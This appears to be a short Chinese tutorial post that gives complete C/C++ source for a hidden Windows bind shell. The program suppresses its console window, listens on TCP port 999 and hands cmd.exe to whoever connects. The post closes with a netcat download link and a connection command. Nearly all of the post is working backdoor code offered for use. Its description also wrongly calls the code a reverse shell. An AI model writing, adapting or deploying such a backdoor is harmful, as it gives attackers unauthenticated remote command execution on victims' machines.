C/C++ 实现正向CMDShell

该段代码是一个用于Windows平台的简单反向Shell程序。它使用Winsock库实现网络通信，创建一个监听套接字并等待控制端的连接请求。一旦控制端连接成功，程序会在被控制端启动一个新的进程，并将标准输入、输出、错误流重定向到网络套接字，以实现远程命令执行和输出回传。

#pragma comment(lib,"ws2_32.lib")

#ifdef _MSC_VER
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#endif

#include <winsock2.h>
#include <windows.h>
#define Port 999


int main()
{
    SOCKET sSocket,cSocket;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    WSADATA wsaData;
    sockaddr_in sSockaddr;
    char szCmdPath[MAX_PATH];
 
    GetEnvironmentVariable("COMSPEC",szCmdPath,MAX_PATH);
    ZeroMemory(&wsaData,sizeof(wsaData));
    ZeroMemory(&si,sizeof(STARTUPINFO));
    ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
    
    WSAStartup(0x0202,&wsaData);
    cSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
    sSockaddr.sin_addr.s_addr=INADDR_ANY;
    sSockaddr.sin_family=AF_INET;
    sSockaddr.sin_port=htons(Port);
    bind(cSocket,(sockaddr*)&sSockaddr,sizeof(sSockaddr));
    listen(cSocket,1);

    int sLen=sizeof(sSockaddr);
    sSocket=accept(cSocket,(sockaddr*)&sSockaddr,&sLen);
    si.cb=sizeof(si);
    si.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
    si.hStdInput=(HANDLE)sSocket;
    si.hStdOutput=(HANDLE)sSocket;
    si.hStdError=(HANDLE)sSocket;
    CreateProcess(NULL,szCmdPath,NULL,NULL,TRUE,0,NULL,NULL,&si,&pi);
    WaitForSingleObject(pi.hProcess,INFINITE);
    
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    closesocket(cSocket);
    closesocket(sSocket);
    WSACleanup();

    return 0;
}

连接时使用nc工具链接即可

下载地址：https://eternallybored.org/misc/netcat/

nc执行命令 nc64.exe -t 192.168.1.12 999 即可链接到主机